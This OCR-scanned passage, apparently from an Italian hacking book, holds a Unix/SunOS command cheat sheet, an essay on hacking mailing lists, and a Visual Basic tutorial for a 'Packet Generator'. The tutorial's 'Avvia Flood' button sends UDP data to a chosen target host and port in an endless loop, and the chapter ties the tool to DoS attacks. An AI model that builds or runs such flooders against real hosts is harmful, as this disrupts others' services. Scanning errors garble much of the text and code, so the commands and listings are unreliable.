CTRL + Q 



List jobs running in the background 
List current processes (ps -aef / grep 

Suspend 

Kill a job (use pid returned by ps; -9 exit 

Send to background. Returns num to use when 

Send to foreground 

Execute command in background 

Continue execution of command even when 

New commandline 
Stop output 
Continue 



Directories : 



pwd 

directory 
ed [ dirname ] 

dirname wil go to your home 
~username moves you to 
mkdir 

rm, rmdir [dirname] 
diremp 

In -s [realpath alias] 
df -bk 

disktool -u [dir] 
fsck 

Interactive repair 



Display the pattinarne of the current working 

Change to directory dirname (ed without 

directory, ed . . moves one directory up, ed 

username's homedir) 
Make directory 

Remove (unlink) files or directories 

Compare directories 

Make symbolic links to files 

Report free disk space on file systems 

Display disk usage o directory 

File system consistency check and 



Files: 



ls -1 

(don't list contents of a folder) , 



List files (—a (list invisible files), —d 

-R (recursively subdir listing) ) 
Move or renarne a file or directory (no —r 



mv [old new] 
needed) 

cp [-r file] Copy file (-r (copy directory) ) 

tar -cf - [source] / (ed [target]; tar -xfvp-; ) Fast copying using tar (p: keep 

permissions , v: verbose) 

ed [source] ; tar -cf - . / (ed [target] ; tar -xfvBp - ) Another possibility (p: 
keep permissions) 

rm [—rf file] Remove file (—f (don't prompt user), —r 

(remove directory) ) 

peri -p -i.old -e ' s/oldstring/newstrin/g ' * .txt Search and replace of a 
string in multiple files 

chmod [o+r file] Change access for file (-R recursively) 

{ u=rw, og+r, a—w) 
chmod [ugo ] 

{ 644=rw_r r } 

umask [x] 

{27=rwxr_x 67=rwx } 



chown [user:group file] 
chgrp [group ] 
more [file] 
for string) ) 

cat [filel file2] > targetfile 
catman 

split -b [bytes file] 

c split 

context 

dd 

formats 

find [path criteria] 

[n] (changed n days ago), 

[ gname ] ) 
volcheck 

in / floppy/ floppyO 
eject 

ejetct the disk 



4=r 6=rw 5=rx 7=rwx 
Without param=disp with=set 
Change owner of file 

Change the group ownership of a file 

Type file (b=back, v=VI, /[string] (search 

Concatenate files 

Create the cat files for the manual 
Split file to packets with size bytes 
Split a file with respect to a given 

Convert and copy files with various data 

Searches for files (—name ['name'] —mtime 

—atime [n] (last read n days ago), —group 

Mount floppy, content will become visible 

After leaving the / floppy/ floppyO directory 
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fdformat 

fddisk -fmt -f /dev/rfdOa 
mformat a : 

mcopy [unixfile a:dosfile] 

mdel [a:dosfile] 

dos2unix [file] 

Unix/ISO format 

unix2dos [file] 

MS-DOS format 

mcopy [unixfile a: dos file] 

directory / floppy/ floppy 0) 

xhfs 

hfs 

/vol/dev/aliases/floppyO, copy in, 
peri -p -i.old -e 's/\r/\n/g' [fil 
from mac to unix or dos to unix) 
diff [filel] [file2] 
differences 
diff 3 
files 
diffmk 

troff input file 
touch [filename] 
a file 
mkfile 



Format a floppy for UNIX 
Format a floppy on trevano 
Format a floppy for MS-DOS 

Copy to a dos disk or the other way round 
Delete a MS-DOS file 

Convert text file from MS-DOS format to 

Convert text file from Unix-ISO format to 

Copy to a dos disk (better use the 

Use Mac disks (HFS file system) 
Use Mac disks (mount 
copyout, dir) 

es] Replaces returns with linefeeds (convert 
Compares two files and display line-by—line 
Display line-by—line differences between 3 
Mark differences between versions of a 
Update the access and modification times of 
Create a file (e.g. for swap space) 



Programming : 
make 

regenerate programs and files 
ce 

gec [file.c] 
g++ [file.C] 
cxx 

adb, dbx 

dbxtool 

debugger 

cxref 

cflow 

javac [file. java] 
pc 



Build source code. Maintain, update, and 

C Compiler 
C Compiler 
C++ Compiler 
C++ Compiler 
Debugger 

SunView interface for the dbx source-level 

Generate a C program cross-reference 
Generate a flow graph for a C program 
JAVA—Compi ler 
Pascal compiler 



Compression : 

gzip [file] 

gunzip [file] 

tar -cvf [target f ile. tar] 

files 

tar —xvf [file] 
tar -tvf [file] 
archive 

compress [file] 
uncompress [file] 
zeat [file] 



[ source ] 



Compress file ( . gz) 
Decompress file (.gz) 
Create archive (.tar) 



from multiple source 



Unpack archive (.tar) 

List archive (.tar) doesn't expand the 

Compress file ( . Z) 
Decompress file (.Z) 
Display expanded contents 



Printing : 



lpr [-P [printer] file] 

-§2 (two copies) ) 

lp [—d [printer] file] 

-n2 (two copies) ) 

lp cancel 

lpc 

lprm 

mapge —[num] —h [file] / lpr 
option) 

nenscript [—p— file] 
nenscript [—p— file] / lpr 
lpq 

lprm [job-ID] 
lpstat -a 
lptest 

pspl [file] / psp2 [file] 
a2ps 



Print file on printer (-K2 (doublé sided) , 

Print file on printer (-K2 (doublé sided), 

Cancel requests to a printer 

Line printer control program 

Remove jobs from the printer queue 

Print num pages on one page with header (—h 

Translate file to Postscript (stdout) 
Translate file to PS and print it 
List queue 

Remove job from queue 

List ali available printers 

Generate lineprinter ripple pattern 

Print text (user defined script) 

Convert text files to ps (nicely formatted) 
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Other Commands: 



man [ comm ] 
apropos [expr ] 
where [comm] 

grep, egrep, fgrep [expr] 
case sensitive) , -c (count 

cut 
file 

cut [—c Num—Num] 
[comm] > [file] 
[comm] » [file] 
[comm] < [file] 
[ commi ] I [ comm2 ] 
lynx 

(quit), left (back), enter 

http : //www. google . com) 
alias [alias comm] 
stty 

stty erase 
terminal settings) 
h 

echo [$var] 
PATII, SHELL, USER, PRINTER, DISPLAY} 
setenv [var vai] 

PATII , SHELL, USER, PRINTER, DISPLAY) 
CTRL + ARROW 
xsetroot -solid blue 
xinit 
Server) 

rup [hostname] 
boot sd (0, 6, 2) 
first) 

halt / fasthalt 
boot 
halt 
fastboot 
disks 
fasthalt 
su 

starting NFS 
peri -p -i . old 
string in 



Get info about command (-k keyword) 
Get info about related commands 
Show path of command 

Filters out lines containing expr (—i 



(not 



only) , -v ( inverse) ) 

Remove selected fields from each line of a 
Cuts lists 

Write output of command to file 
Append output of command to file 
Content of file => input of command 
Output of commandl => input of command2 
Text based version of netscape (g (go) , q 

(follow link), Search: 

Define alias for long commands 
Set or alter the options for a terminal 
Set erase key to backspace (or other 

Display history (on trevano only) 
Print value of var or expr (HOME, 



Set var to vai (HOME, 

} 

Switch workspace 
Set background 

Initialize X— Server (use strtx to start X— 
Status of host 

Boot from CD-ROM (check with probe-scsi 

Shut down (root only) 
Reboot the system 
Halt the system 

Reboot the system without checking the 



Halt the system without checking the disks 
Become super user (or any other user) 
/usr/lib/nfs start ali apps there 
s/oldstring/newstrin/g' * .txt Search and replace of a 



clear 
nslookup 

(specify damain e.g: ElfQrin.com) 



multiple files 
Clear screen 

Resolve domain names (server [dnsserver] 



adduser 
arch 

at, batch 
atq 
times 
atrm 

automount 
awk 

banner 
bar 

basename, 

biff 

cai 

calendar 
cb 

click 

clock 

cmdtool 

facility 

cmp 

colrm 

line 

config 

cpio 

crontab 

ctrace 



di marne 



procedure for adding new users 
display the architecture of the current host 
execute a command or script at a specified time 
display the queue of jobs to be run at specified 

remove jobs spooled by at or batch 

automatically mount NFS file systems 

pattern scanning and processing language 

display a string in large letters 

create tape archives, and add or extract files 

display portions of pathnames and filenames 

give notice of incoming mail messages 

display a calendar 

a simple reminder service 

a simple C program beautifier 

enable or disable the keyboard's keystroke click 

display the time in an icon or window 

run a shell (or program) using the SunView text 

perform a byte— by— byte comparison of two files 
remove characters from specified columns within each 

build system configuration files 
copy file archives in and out 

instali, edit, remove or list a user's crontab file 
generate a C program execution trace 
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date 
de 

devinfo 
dkinfo 

partitioning 
dname 

domainname 
dos 
du 

or file 
dump, rdump 
dumpfs 
edquota 
eeprom 

enablenumlock , 
env 
execution 

eqn, neqn, checkeq 
error 

responsible source file 

expand, unexpand 

versa 

export fs 

export s, xtab 

expr 

string expression 

extract_patch 

tapes 

ext ract_ unbun di ed 
scripts 

factor, primes 

file 

contents 

fiat , fmt_ma i 1 

fold 

given width 

fonftlip 

fontedit 

format 

fortune 

from 

messages 
fstab, mtab 
table 
f77 

gfxtool 

groups 

gterm 

gxtest 

head 

hostid 

hostname 

hosts 

hosts . equiv, .rhosts 

iconedit 

panel items 

id 

imtool 
indent 
iostat 
join 

lastcomm 
ld, ld.so 
ldd 
leave 
lex 

logname 
look 

sorted list 
mach 

mail, Mail 

mailtool 

mkfs 

mkproto 

mount, umount 

mt 

nawk 



display or set the date 
desk calculator 

print out system device Information 
report Information about a disk's geometry and 

print RFS domain and network names 
set or display name of the current NIS domain 
SunView window for IBM PC/AT applications 
display the number of disk blocks used per directory 

incrementai file system dump 
dump file system Information 
edit user quotas 

EEPROM display and load utility 
disablenumlock enable or disable the numlock key 

obtain or alter environment variables for command 



typeset mathematics 

categorize compiler error messages, insert at 
lines 

expand TAB characters to SPACE characters, and vice 

export and unexport directories to NFS clients 

directories to export to NFS clients 

evaluate arguments as a logicai, arithmetic, or 

extract and execute patch files from installation 

extract and execute unbundled-product installation 

factor a number, generate large primes 
determine the type of a file by examining its 

simple text and mail—message formatters 

fold long lines for display on an output device of a 

create Sun386i-style vfont file 
a vfont screen—font editor 

disk partitioning and maintenance utility 
print a random, hopefully interesting, adage 
display the sender and date of newly-arrived mail 

static filesystem mounting table, mounted filesystems 

running Fortran on Suns 

run graphics programs in a SunView window 
display a user ' s group memberships 

virtual graphics terminal for the SunView environment 
stand alone test for the Sun video graphics board 
display first few lines of speci fied files 
print the numeric identifier of the current host 
set or print name of current host system 
host name data base 

trusted remote hosts and users 
create and edit images for SunView icons, cursors and 

print the user name and ID, and group name and ID 
image display server for the SunView environment 
indent and format a C program source file 
report I/O statistics 
relational database operator 

show the last commands executed, in reverse order 

link editor, dynamic link editor 

list dynamic dependencies 

remind you when you have to leave 

lexical analysis program generator 

get the name by which you logged in 

find words in the system dictionary or lines in a 

display the processor type of the current host 

read or send mail messages 

SunView interface for the mail program 

construct a file system 

construct a prototype file system 

mount and unmount file systems 

magnetic tape control 

pattern scanning and processing language 
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lines of one 



language 



newaliases 
newfs 
nice 
ni 

nroff 
od 

pagesize 
paste 
subsequent 
perfmeter 
chart 
ping 
pr 

columns 
printenv 
pstat 
quota 

re, rc.boot, re. locai 
rcp 
rdate 
rdist 
reboot 
renice 
repquota 

restore, rrestore 
rev 
rsh 

ruptime 
script 
sdiff 
side 
sed 
sh 

and command—level 
shelltool 
window 
showmount 
shutdown 
sleep 
sort 

speli, hashmake, spellin, 

spline 

strings 

strip 

file 

sundiag 

suninstall 

sunview 

swapon 

symorder 

sync 

disk 

tabs 

tail 

tbl 

tcopy 

tee 

tektool 
test 

expression 

textedit 

time 

toolplaces 
other attributes 
tput 
tr 

trace 

traffic 

troff 

tset, reset 
tsort 
tty 
tunefs 
uniq 
units 
unmount, 
uptime 



rebuild the data base for the mail aliases file 
create a new file system 
run a command at low priority 
line numbering filter 

format documents for display or line-printer 
octal, decimai, hexadecimal, and ascii dump 
display the size of a page of memory 
join corresponding lines of several files, or 
file 

display system performance values in a meter or strip 

send ICMP ECHO_REQUEST packets to network hosts 
prepare file for printing, perhaps in multiple 

display environment variables currently set 
print system faets 

display a user ' s disk quota and usage 

command scripts for auto-reboot and daemons 
remote file copy 

set system date from a remote host 
remote file distribution program 
restart the operating system 
alter nice value of running processes 
summarize quotas for a file system 
incrementai file system restore 
reverse the order of characters in each line 
remote shell 

show host status of locai machines 
make typescript of a terminal session 
contrast two text files by displaying them side-by- 



stream editor 
shell, the standard 



UNIX system command interpreter 



umount 



run a shell (or other program) in a SunView terminal 

show ali remote mounts 
dose down the system at a given time 
suspend execution for a specified interval 
sort and collate lines 

hasheheck report spelling errors 

interpolate smooth curve 

find printable strings in an object file or binary 
remove symbols and relocation bits from an object 

system diagnostics 

instali and upgrade the SunOS operating system 
the SunView window environment 

specify additional device for paging and swapping 
rearrange a list of symbols 

update the super block; force changed blocks to the 

set tab stops on a terminal 
display the last part of a file 
format tables for nroff or troff 
copy a magnetic tape 
replicate the standard output 

SunView Tektronix 4014 terminal— emulator window 
return true or false according to a conditional 

SunView window- and mouse— based text editor 
time a command 

display current SunView window locations , sizes, and 

initialize a terminal or query the terminfo database 

translate characters 

trace system calls and signals 

SunView program to display Ethernet traffic 

typeset or format documents 

establish or restore terminal characteristics 
topological sort 

display the name of the terminal 

tune up an existing file system 

remove or report adjacent duplicate lines 

conversion program 

remove a file system 

show how long the system has been up 
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users 

vacation 

vi, view, vedit 

vipw 

vmstat 

wall 

wc 

whatis 
whereis 
a command 
which 
yes 



display a compact list of users logged in 

reply to mail automatically 

visual display editor based on ex 

edit the password file 

report virtual memory statistics 

write to ali users logged in 

display a count of lines, words and characters 

display a one-line summary about a keyword 

locate the binary, source, and manual page files for 

locate a command; display its pathname or alias 
be repetitively affirmative 



CSH: 

csh is a shell (command interpreter) with a C—like syntax and advanced 
Interactive features 

csh, %, @, alias, bg, break, breaksw, case, continue, default, dirs, else, end, 
endif, endsw, eval, 

exec, exit, fg, foreach, glob, goto, hashstat, history, if, jobs, label, limit, 
logout, notify, 

onintr, popd, pushd, rehash, repeat, set, setenv, shift, source, stop, suspend, 
switch, then, 

umask, unalias, unhash, unlimit, unset, unsetenv, while 



Important directories and files: 

-/ ■ fvmrc 
~/. dtwmrc 
~/.dt/* 

of launch pad) , other DTWM 

~/ . tcshrc 
~/ . cshrc 
-/. login 
executed once) 
-/ . rhosts 
-/ .httpusers 
-/ . pap—secrets 
-/ . slirprc ~/ . ppprc 
~/publ ic_html 
/ usr/bin 
/usr / 'local/bin 
/ opt / gnu/bin 
/ usr/sbin 
/usr/share/man 
/dev 

disk drives 
/voi 
/etc 

(startup e.g. S72inetsvc (routing) 
(DNS IP addresses) , hosts, 
shell s (users and their shell 
and its service) , nsswitch . conf (in 
resolving) , ppp/ (pap-secrets and 

other ppp settings) , nodename, 
hostname . [interfacename] (hostname associated 

with this interface e.g. leO) , fstab 
(mounting table) , ssh* (ssh stuff) ) 



Window mangager configuration (FVWM) 
Window mangager configuration (DTWM) 
(errorlog, startlog, icons, types (setting 

resources) 
TC-Shell settings 
C-Shell settings 

Login script (for desktop login only, 

Remote hosts file 
Alowed users for secret pages 
PAP secrets for slirp 
Slirp and ppp config files 
Home Page directory 
Applications 
More applications 

Gnu stuff like g++, gec, gzip and more 
System tools 
Manual files 

Devices like ttya (serial port) , audio and 
Automounted volumes 

(rc2 (things to do at startup), rc2.d 
passwd, shadow (passwords) , resolve.conf 
ftpusers (users who can't access ftp), 
important for ftp) , services (port numer 
colum hosts we have to write dns to use dns 



/ usr/var/1 og 

/usr /locai /WWW/ logs 

/ var/adm 

startup process (for debugging 



Home Page Log on SUN 
Home Page Log on 0SF1 

messages (Messages from applications and 



/var/ spool /mail 
/usr/local/WWW 
/usr/ locai/ etc/httpd 
/usr /dt /conf ig/C/* 
(Configuration file for the Login 

Manager), sys. dtwmrc (de fault 
windowmangager configuration) , and others) 



purposes) , sulog) 
Mail (on SUN: /var /mail) 
WWW-directory (e.g. settings and CGI) 
WWW-directory on gummibaum 
Default desktop settings (Xresources 
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/ so f t /public/Xll / lib/ fvwm/ system. fvwmrc System fvwmrc file 



/etc/ issue.net Welcome message (before login in) 

VI: 

<ESC> Command mode 

i Insert 

I Insert at beginning of a line 

a Insert after 

A Insert at the end of the line 

o Insert a line below 

0 Insert a line above 

J Connect this and the next line 

r Change char 

R Overwrite 

x Delete char 

dd Delete line 

D Delete rest of line 

h / 1 Move left / right 

j / k Move down / up 

w, b, e Move cursor one word 

H Home 

L End 

M Middle 

G Go to bottom 

p Undo 

etri + f Page down 

etri + b Page up 

■./[stringi Search for string 

:? [stringi Search backwards 

: [ni Goto line n 

: w Save 

:q Exit 

:x Save & exit 

Navigation inside more, man. . . 



SPACE Moves one page down 

B Moves one page up 

ENTER Moves one line down 

Q Quit 

X— Windows Progs : 



xterm / dtterm Terminal 

xmailtool / mailtool Mail 

emacs / textedit Word processor 

xcalc Calculator 

xv Graphic Viewer and converter 

xlock Lock up 

xset X—Win settings 

Alias : 



alias ls ls -1 List in long format 

alias rm rm —rf Remove files and directories without 

prompting user 

alias cp cp —r Copy files and directories 

alias df df —bk Display free space and used space in bytes 

alias ps ps —aef / grep $USER List ali jobs of user 

alias txt2ps nenscript —p— Translate text to PostScript (stdout) 

alias pspl /~/Script/psprintl Print text on dali 

alias psp2 /~ /Script /psprint2 Print text on ps2 



Shell : 



starts with: § ! /bin/sh, contains command lines, must Jiave x—permission, start 
with . /Scriptname, *=any string (except .), ?=any char, [a-d]=any char from a 
to d (lower case), be carefull with special chars S=\&, to execute 
at a speci fic time use: at hh:mm +[minutes] minutes < Scriptname, to divert to 
nirvana stout : >&— or stin: <&— 
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AltaVista : 

Standard: <+>="AND" <space>="OR" 

Advanced: AND OR NEAR URL () * (e.g: appiè* AND ( (quicktime OR video) 
NEAR 3. 0) ) 

Netscape : 



about : image-cache 
about : memory-cache 
about : cache 

protocol : / /name : password@domain/path/ filename . extension#anchor?parameterlmeter 
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Hacker's Programming Book 
I contributi dalle Mail List 
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Le M ail List sull'hacking 

Qualsiasi hacker all'inizio cerca di informarsi su quelle che possono essere anche solo i punti 
orientativi iscrivendosi ad alcune MAIL LIST. 

Moltissime di queste sono italiane anche se come al solito quelle più interessanti sono quelle 
americane ed in particolar modo quelle che pur trattando di hacking di fatto non si definiscono 
come tali ma legate alla sicurezza di rete. 

La società in cui viviamo è sempre più soffocante nei confronti degli individui i quali cercano 
qualsiasi strada per sfuggire a questo meccanismo uniformante che cerca di soffocare 
qualsiasi individuo spingendolo nei meandri dell'anonimità. 

Questa inconscia violenza che la società esegue sulle persone fa nascere un esigenza di 
ribellione al sistema che in campo internet spesso sfocia nella voglia di 'distruggere' tradotta, 
forse in modo errato, ne significati attribuiti agli hackers. 

Che questa sia l'esigenza di molti casi è evidente in particolar modo se si frequentano certe 
mail list hacker o alcuni canali IRC. 

Spesso su queste mail list non si crea nulla se non i piccoli imperi di certi individui i quali 
mantengono le distanze dai loro sudditi mediante un martellare continuo di bestemmie di tutti 
i tipi. 

La violenza ideologica viene proietta anche all'interno di un modo di comportamento sociale 
nell'ambito di quegli ambienti virtuali che sono le mail list e le chat. 

Scegliere casualmente una mail list è spesso umiliante più del dovuto in quanto gli imperatori 
di quella zona tendono a dare dello stupido a chiunque cerchi di avvicinarsi al trono e 
comunque il fatto di distribuire la conoscenza non è sicuramente lo scopo fondamentale di 
quelle ML. 

E' inutile dire che la mail list ideale dovrebbe essere quella in cui la parola spetta a chiunque 
e dove i partecipanti più eruditi cercano di non sottolineare il grado basso di chi cerca di 
avvicinarsi alle argomentazioni trattate. 

Pensate ad un mail list in cui un nuovo partecipante formula una domanda e come unica 
risposta riceve "Ignorante perché invece di rompere le scatole qui non ti cerchi quello che 
vuoi sulla rete senza noiosare ?" 
Costruttiva, non è vero ? 

In una mail list come questa chiunque sarebbe incitato a continuare. 
Scherzi a parte. 

Quando all'inizio delle mie esperienze telematiche nel 1984 creai con altri sysop la FIDONET 
italiana la mia idea era quella di creare una struttura che permettesse a persone che 
nutrivano gli stessi interessi di scambiarsi le proprie esperienze. 

La stessa motivazione è stata quella che mi ha spinto a scrivere diversi altri volumi, oltre 
questo, e a distribuirli gratuitamente. 

In ambito internet la mia adesione è stata nei confronti di una mail list 'educata' magari non di 
quelle in cui si parla mediante codifiche algoritmiche allo stato puro ma nella quale potesse 
sopravvivere anche la componente umana. 

In altre parole ho evitato le mail list di superman in quanto non sarei riuscito a sopravivere al 
suo interno in quanto non possiedo un lenzuolo rosso e una tutta con una S marcata sul 
petto. 

Quella a cui mi riferisco è ZeroHack@domeus.it o alla sua lista di backup 
ZeroHack@crackinquniversity2000.it 

L'idea di questo volume è di fatto nata in questo ambito e sempre in relazione a questo 
ambiente è nata la proposta di inserire negli aggiornamenti di questo libro qualsiasi utility 
venisse sviluppata e distribuita all'interno della ML stessa. 

Questa sezione del volume è dedicata ai software italiani nati nell'ambito di questa ML. 



PACKET GENERATOR byj ARRET 

Negli appositi capitoli abbiamo parlato della necessità in alcuni casi di generare dei pacchetti 

da utilizzare in alcune tecniche come ad esempio nel caso di attacchi DOS. 

Fino ad ora abbiamo visto wlnject ed alcuni sorgenti utilizzati per scopi ben definiti. 

A questo punto invece ecco la prima utility nata dall'ambiente ZeroHack. 

Si tratta di un software scritto in VB che funge da generatore di pacchetti. 

La guida è stata fornita dallo stesso autore. 
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Premessa: 

Con questa piccola guida, si presume che chi la legge abbia un minimo di conoscenza della 
programmazione in Visual Basic. 

Il progetto: 

Vedremo ora come strutturare l'applicazione PACKET GENERATOR, cioè una piccola utility 
in grado di creare pacchetti e di trasmetterli in rete utilizzando le librerie Winsock. 
Attenzione! Non si tratta di una consolle mirata ad attacchi di tipo D.o.S., ma bensì, una utility 
in grado di generare pacchetti personalizzabili da trasmettere a un computer host. 
Saremo così in grado di ricostruire e analizzare i pacchetti inviati e ricevuti utilizzando in 
seguito uno sniffer (ad esempio ComView). 

Iniziamo a creare l'interfaccia utente: 

Per prima cosa, è buona abitudine stendere il progetto su carta dell'applicazione che 

vogliamo creare in modo da poter avere ben sotto gli occhi ciò che vogliamo. 

Ora, facciamo finta di aver già passato questo punto, visto che l'applicazione esiste già e 

passiamo alla stesura dell'interfaccia utente. 

Avviamo Visual Basic e facciamo click su creazione EXE Standard. 

Fatto questo ci appare il primo Form che di default si chiama Formi. Rinominiamolo in 
frmMain. 

Ora inseriamo i controlli. 

Per creare la nostra applicazione, avremo sulla barra sinistra (generale) già tutti i controlli che 

ci servono, tutti, tranne due: Winsock e CommonControl 6.0 (su SP4) 

Per inserirlo, andiamo nella barra del menù e clicchiamo su ProgettoComponenti. 

Si aprirà la finestra Componenti. 

Ora scorriamo l'elenco e cerchiamo Microsoft Windows Common Control 6.0, spuntiamo il 
checkbox e scorriamo ancora di poco giù e andiamo a selezionare Microsoft Winsock 
Control 6.0. 

Ok, ora abbiamo tutto quello che ci serve. Selezionati questi due controlli, scegliamo applica 
eOK. 

Ora sulla sinistra, nella barra Generale di VB troveremo dei nuovi controlli, cioè quelli che 
abbiamo appena selezionato. 
Ora passiamo all'azione 

Abbiamo il nostro bel form che noi abbiamo rinominato frmMain, ok, ora iniziamo a inserire i 
controlli. 

E cerchiamo di creare un'interfaccia simile a quella qui sotto. 




NOTA: L'immagine di sfondo che vedete qui sopra ovviamente non è necessaria, ma per 
abbellire un po' l'applicazione potrete crearvi anche voi un'interfaccia inserendo poi 
direttamente nelle proprietà del Form alla voce Picture una BMP. 
Andiamo avanti... 

Cerchiamo ora di assegnare i nomi ai controlli nel modo che segue. 
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Attenzione! In caso decidiate di assegnare nomi diversi ai controlli, in seguito dovrete 
modificare anche il codice sorgente, dichiarando nelle Sub Routine il nome che avrete scelto 
per il controllo. 




Ok, ora assegnamo valori ad ognuno di questi controlli nel modo seguente: 



Textl 






Tablndex 




1 


Text 




0.0.0.0 


Text2 






MaxLength 


= 


255 


MultiLine 




True 


ScrollBars 


= 


Vertical 


Tablndex 




2 


Text 3 






Locked 




True 


Tablndex 




9 


Text 




Pronto per la trasmissione . . 


TxtPorta 






MaxLength 




5 


Tablndex 




3 


Text 




80 


Commandl 






Caption 




Avvia Flood 


Tablndex 




4 


Command2 






Caption 




Stop 


Tablndex 




5 


Command3 






Caption 




Accetta 


Tablndex 




16 


Command4 






Caption 




Pinga 


Enabled 




False 


Checkl 






Value 




Unchecked 


Enabled 




False 


Sliderl 






Tablndex 




12 


Winsockl 






Protocol 




sckUDPProtocol 


Combol 
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Ora che abbiamo attribuito ai vari controlli i loro valori, passaimo alla stesura del codice 
sorgente. 

Clicchiamo sul form due volte. Ci apparirà la Sub Routine Private Sub Form_Load() ma 

cancelliamola, nessun evento Form_Load() servirà al progetto. 
Inseriamo ora: 

Sub Timeout (interval) 
Dim Current 
Current = Timer 

Do While Timer - Current < Val (interval) 
DoEvents 

Loop 



Fatto questo passiamo alla stesura del codice abbinato all'evento Click() sul Commandl, 
quindi facciamo doppio click su Commandl (che corrisponde al nostro tasto AVVIA FLOOD) 
e scriviamo nella subroutine quanto segue: 

Private Sub Command1_Click() 
On Error Resumé Next 
If Text2.Text = "" Then 

MsgBox "Non e' stata inserita nessuna stringa da inviare!", vbCritical 
Text3.Text = "Trasmissione sul target non riuscita, il valore di trasmissione e' 0..." 
End If 

Dim target As String 
target = Textl Text 
Dim Porta As Integer 
Porta = txtPorta.Text 
Command2.Enabled = True 
Commandl .Enabled = False 

Text3.Text = "Trasmissione pacchetto su " & target & " in corso..." 

Winsockl .LocalPort = 2043 

Winsockl .RemoteHost = Textl 

Winsockl .RemotePort = Porta 

Do 

DoEvents 

Winsockl .SendData Text2 
DoEvents 

f SlideM .Value = 9 Then Timeout (0.1 ) 
If SlideM .Value = 8 Then Timeout (0.2) 
f SI 
f SI 
f SI 
f SI 
f SI 
f SI 



derl .Value = 7 Then Timeout (0.3) 
derl .Value = 6 Then Timeout (0.4) 
derl .Value = 5 Then Timeout (0.5) 
derl .Value = 4 Then Timeout (0.6) 
derl .Value = 3 Then Timeout (0.7) 
derl .Value = 2 Then Timeout (0.8) 
f SlideM .Value = 1 Then Timeout (0.9) 
If SlideM .Value = 0 Then Timeout (1 ) 
Loop While Commandl .Enabled = False 
Winsockl .Close 
Commandl .Enabled = True 
Command2. Enabled = False 
Exit Sub 



Passiamo ora a Command2 (Pulsante STOP) e inseriamo altro codice: 
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Private Sub Command2_Click() 
Dim target As String 
target = Textl .Text 
Command2.Enabled = False 
Commandl .Enabled = True 

Text3.Text = "Trasmissione su " & target & " terminata..." 
End Sub 



Ora inseriamo il codice per abbinato al Command3 (Pulsante ACCETTA) e inseriamo il 
listato: 

Private Sub Command3_Click() 
On Error Resumé Next 
Dim target As String 
target = Textl Text 
Select Case Combol 

Case Is = "GET ../.." 

If Combol Text = "GET ../.." Then 

Text2.Text = "GET ../.." 

Command4. Enabled = False 

Checkl .Enabled = False 

End If 

Case Is = "HEAD" 
If Combol Text = "HEAD" Then 
Text2.Text = "HEAD" 
Command4. Enabled = False 
Checkl .Enabled = False 
End If 

Case Is = "HELO target.com" 

If Combol Text = "HELO target.com" Then 

Text2.Text = "HELO " & target 

Command4. Enabled = False 

Checkl .Enabled = False 

End If 

Case Is = "PING 0.0.0.0 -ICMP 255 -T" 

If Combol Text = "PING 0.0.0.0 -ICMP 255 -T" Then 

Checkl .Enabled = True 

Command4. Enabled = True 

End If 
End Select 
End Sub 

Adesso finiamo di inserire il codice utilizzando la Subroutine di Command4 (Pulsante PINGA) 
n questo modo: 

Private Sub Command4_Click() 

On Error Resumé Next 

Dim target As String 

Dim Porta As Integer 

Porta = txtPorta.Text 

target = Textl Text 

If Checkl .Value = Checked Then 

Shell ("command.com /k ping " & target & " -icmp 255 -t"), vbNormalFocus 
Command4. Enabled = False 
Checkl .Enabled = False 

Text3.Text = "Trasmissione PING su " & target & " modalità MS-DOS in corso..." 
End If 
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If Checkl .Value = Unchecked Then 

Text2.Text = "PING avviato su " & target & ". Premere STOP per terminare" 

Text3.Text = "Trasmissione PING su " & target & " in corso..." 

Command4.Enabled = False 

Checkl .Enabled = False 

Command2.Enabled = True 

Commandl .Enabled = False 

Winsockl .LocalPort = 2043 

Winsockl .RemoteHost = Textl 

Winsockl .RemotePort = Porta 

Do 

DoEvents 

Winsockl .SendData Text2 
DoEvents 

If Sliderl .Value = 9 Then Timeout (0.1 ) 
If Sliderl .Value = 8 Then Timeout (0.2) 
If Sliderl .Value = 7 Then Timeout (0.3) 
If Sliderl .Value = 6 Then Timeout (0.4) 
If Sliderl .Value = 5 Then Timeout (0.5) 
If Sliderl .Value = 4 Then Timeout (0.6) 
If Sliderl .Value = 3 Then Timeout (0.7) 
If Sliderl .Value = 2 Then Timeout (0.8) 
If Sliderl .Value = 1 Then Timeout (0.9) 
If Sliderl .Value = 0 Then Timeout (1 ) 
Loop While Commandl .Enabled = False 
Winsockl .Close 
Commandl .Enabled = True 
Command2. Enabled = False 
Exit Sub 
End If 
End Sub 

A questo punto salviamo la nostra applicazione e proviamo a lanciare il Run-Time premento 
F5. Se tutto funziona, potrete crearne l'eseguibile da File>Crea PacketGenerator.exe (qui vi 
apparirà il nome Crea... seguito dal nome che avrete scelto da dare alla vostra applicazione). 
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Tabelle utili 



COMMON COMMAND EXAMPLES 



ifconfig plurrib # Soiarà: probe far network interface^ 
ifconfig loO 127.0.0.1 up S Loopback interface 
ifconfig enO inet 128.130.240.1 up netmask 
OxFFFFFFOO broadcast 12S. 130.240.255 

route add net 128.130.138.0 128.130.240.12 1 
route add default 128.130.240.12 1 

# BSD/OS and QSF/1 use -net and -host and no metric 
route add -net 128.130.138.0 12S.1 30.240.12 
route add default 128.130.240.12 

netstat -rn # Routing tabie (numeric addresses) 
netstat -I enO 5 # Monitor enO at 5-second intervak 
n etsta t -in %in teriaces (numeric addresses} 

dump Ouf /dev/nrstO /users # Leve! 0 dump 
dump Of - /usr I (ed /rnnt; restare ™f -) # Copy 

tar cf - ./fronn I (ed todir; tar xvfp -) # Copy dir 

# Find object fiies iarger than IMS net accessed in a year 
find /users -type f -nanne "*.o" -size +1048576c 

-atime +365 -print 

# list ali Csource fSes sorted by number ofiines. 
find . -nanne "*.c" -exec wc -I {} l I sort -nr 

# A mora effimeri f venion 

find . -nanne "*.c" -print I xargs wc -I I sort -nr 

# tfun in daemon mode, process queue eve/y 30 min 
sendmail -bd -q30m 

# finn in address test mode with a nei-v confìg ftie 
sendmail -bt -O'etc.^endmail.cf .new 

ps -asu # User-on'ented output in BSD (slaw) 

ps -asl # Technical output in BSD (fai tf 

ps -ef tf User-oriented output in System V 

ps -ef I # Technical output in System V 
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TOKENS USED IN SENDMAILCF 



Token D«l>ug Meanìng 

$tì Match zero tokens (V8 only] 



s 


■R 


Match exactly one token 


S+ 


'0 


Match oriQ or more tokens 


S' 


■ P 


Match zero or more tokens 


JX 




Match va lue of rnacro variableX 


ì&x 




Match va lue of X. at run ti me 


i=x 


*sx 


Match any token in dassX 


i -x 


■■ TX 


Match any token not in class X 



The Debug column show^ the tokens as they villi be printed 
